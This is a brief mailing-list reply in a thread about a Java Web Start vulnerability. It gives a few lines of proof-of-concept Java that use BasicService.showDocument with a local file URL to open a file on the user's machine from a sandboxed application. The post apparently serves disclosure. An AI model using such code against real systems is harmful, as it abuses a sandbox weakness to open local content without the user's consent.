[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Java Web start vulnerability



proof of concept code

BasicService basicService = (BasicService)    
ServiceManager.lookup("javax.jnlp.BasicService");

URL mike = new URL("file:\\C:\\music.rm");

basicService.showDocument(mike);